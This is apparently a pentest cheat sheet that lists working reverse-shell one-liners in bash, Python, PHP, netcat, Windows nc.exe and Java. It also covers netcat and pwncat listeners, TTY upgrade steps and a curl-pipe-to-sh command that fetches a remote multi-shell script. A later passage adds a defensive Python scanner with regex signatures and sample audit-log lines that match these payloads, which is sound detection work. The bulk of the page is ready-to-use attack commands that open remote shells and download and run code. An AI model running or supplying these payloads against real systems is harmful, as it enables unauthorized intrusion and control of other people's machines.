Reverse-Shell

A list of reverse shells in multiple languages. Replace the {IP} and {PORT} values with an IP:port pair that the target server can reach. Then, on your local machine, open a listener with netcat:

On local machine

Listen with NetCat

To listen for an incoming connection and upgrade to a pty shell:

nc -lvnp {PORT}

# after the connection is established
python -c 'import pty; pty.spawn("/bin/bash")'

On macOS, use the netcat from Homebrew instead of the one shipped with the OS.

Wrap the listener in rlwrap to get working arrow keys and line editing.

Listen with PwnCat

pwncat is a netcat with advanced features.

pwncat -lv {PORT}

Upgrade the shell

Then press Ctrl-Z to suspend the connection and return to your own terminal. In your own terminal, type:

stty raw -echo

The console will now appear blank (echo is off); next, foreground the shell with:

fg
reset

On target host:

export SHELL=bash
export TERM=xterm-256color
stty rows 24 columns 80

You should now have a fully interactive shell in which keyboard shortcuts work.

On the remote server

Windows

Upload nc.exe to the remote server, then run the following (same syntax as the Netcat payload below):

cmd.exe /C "nc.exe {IP} {PORT} -e cmd.exe"

PowerShell

This is explained in the Windows / Download and execute script section.

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/{IP}/{PORT} 0>&1

The /dev/tcp pseudo-device is a bash built-in, so this payload must run under /bin/bash. If the target's default shell is sh or dash, wrap the command in bash -c "<cmd>" to force bash.

Netcat

nc -e /bin/sh {IP} {PORT}

Java

Groovy (the `as String[]` cast is Groovy syntax, e.g. for a script console), with the command array as the payload:

r = Runtime.getRuntime();p = r.exec(["your payload"] as String[]);p.waitFor()

Plain Java:

String[] cmd={"cmd","/C","<cmd>"};Runtime.getRuntime().exec(cmd);

The same Runtime.exec() payload also works from BeanShell scripts.

PHP

php -r '$sock=fsockopen("{IP}",{PORT});exec("/bin/sh -i <&3 >&3 2>&3");'

The redirections assume the socket is file descriptor 3, i.e. the first descriptor the PHP process opens after stdin, stdout and stderr.

Reverse Shell as a Service

This website generates a bash script containing multiple reverse shells. The script detects which tools are available on the target and runs the matching payload.

curl https://resh.now.sh/{IP}:{PORT} | sh

You can also download the script locally and serve it to the target with Python's built-in HTTP server:

# On your machine
cd www
curl https://resh.now.sh/{IP}:{PORT} > x
python -m http.server

# On the remote machine (http.server listens on port 8000 by default)
curl http://{IP}:8000/x | sh
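A defender's counterpart to the payloads listed above, added here as example code that is not part of the original page: a small Python scanner that flags the reverse-shell command-line patterns from this page in process-audit logs. The log format (host, user and command line separated by tabs), the 192.0.2.x documentation addresses and the sample lines are all constructed for the example.

```python
import re

# Signatures for the one-liners listed on this page. Each regex is deliberately
# loose about the IP/port so it also matches payloads aimed at other listeners.
REVERSE_SHELL_SIGNATURES = {
    "bash-devtcp":   re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "netcat-exec":   re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd(?:\.exe)?)"),
    "python-dup2":   re.compile(r"socket\.socket\(.*os\.dup2\(.*subprocess"),
    "php-fsockopen": re.compile(r"fsockopen\(.*exec\(.*<&3"),
    "curl-pipe-sh":  re.compile(r"\bcurl\b[^|]*\|\s*(?:ba)?sh\b"),
    "pty-upgrade":   re.compile(r"pty\.spawn\("),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of every signature that matches one process command line."""
    return [name for name, rx in REVERSE_SHELL_SIGNATURES.items() if rx.search(cmdline)]


def scan_log(lines):
    """Scan constructed audit lines ("host<TAB>user<TAB>cmdline") and return
    (host, user, signature) tuples for every match; malformed lines are skipped."""
    hits = []
    for line in lines:
        if line.count("\t") < 2:
            continue
        host, user, cmdline = line.split("\t", 2)
        for sig in classify(cmdline):
            hits.append((host, user, sig))
    return hits


# Constructed sample log: four of the page's payloads plus two benign commands.
SAMPLE_LOG = [
    "web01\twww-data\tbash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "web01\twww-data\tpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
    "socket.SOCK_STREAM);s.connect((\"192.0.2.10\",4444));os.dup2(s.fileno(),0);"
    "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "web01\twww-data\tcurl https://resh.now.sh/192.0.2.10:4444 | sh",
    "app02\ttomcat\tcmd.exe /C \"nc.exe 192.0.2.10 4444 -e cmd.exe\"",
    "db01\tpostgres\tnc -z 10.0.0.5 5432",
    "web01\troot\tcurl -s https://example.com/health | jq .status",
]

if __name__ == "__main__":
    for host, user, sig in scan_log(SAMPLE_LOG):
        print(f"ALERT {host} user={user} signature={sig}")
```

Feed real process-creation or shell-audit records through scan_log() in the same three-column shape; the signature names are a starting point to map onto your own alerting rules.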

Forward shell

If the remote server cannot connect back to your local machine, it is still possible to use a shell that accepts commands from a named pipe (created with mkfifo) and writes the output to a file.

IppSec has a repository on GitHub with a simple but effective script that demonstrates the technique against a vulnerable web server: forward-shell. You need to set the vulnerable URL (self.url = r"http://'...) and the exploit arguments (headers = {'User-Agent': payload}). Remember that the same technique works on any other service that lets you inject commands.